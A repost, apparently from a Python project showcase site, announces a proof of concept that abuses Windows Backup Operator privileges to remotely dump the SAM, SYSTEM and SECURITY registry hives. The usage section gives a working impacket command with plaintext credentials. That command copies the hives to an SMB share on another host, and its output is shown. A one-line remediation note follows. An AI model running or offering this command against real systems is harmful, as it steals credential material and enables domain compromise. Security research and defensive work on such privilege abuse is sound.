A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY

Feb 17, 2022 1 min read

Backup Operator Registry Backup to Domain Compromise

A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY hives.

Research credit to:

@filip_dragovic
Ported from @mpgn Windows PoC

Usage

This proof of concept is a modified version of impacket/examples/reg.py and will work with the most recent impacket release installed. All supported impacket authentication mechanisms will work.

root@kali:~# python3 reg.py jsmith:'Spring2021'@10.0.229.1 backup -p '\\10.0.220.51\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

Dumping SAM hive to \\10.0.220.51\share\SAM
Dumping SYSTEM hive to \\10.0.220.51\share\SYSTEM
Dumping SECURITY hive to \\10.0.220.51\share\SECURITY

Remediation:

Treat Backup Operators domain group as Domain Adminstrators and other Tier 0 resources

GitHub

View Github

John was the first writer to have joined pythonawesome.com. He has since then inculcated very effective writing and reviewing culture at pythonawesome which rivals have found impossible to imitate.

A simple POC that abuses Backup Operator privileges to remote dump SAM, SYSTEM, and SECURITY

Backup Operator Registry Backup to Domain Compromise

Usage

Remediation:

GitHub

John

This module can colorize any text in your terminal

Building a Mario-like, classic platformer game in Python using the PyGame Library

Backup Operator Registry Backup to Domain Compromise

Usage

Remediation:

GitHub

This module can colorize any text in your terminal

Building a Mario-like, classic platformer game in Python using the PyGame Library

You might also like...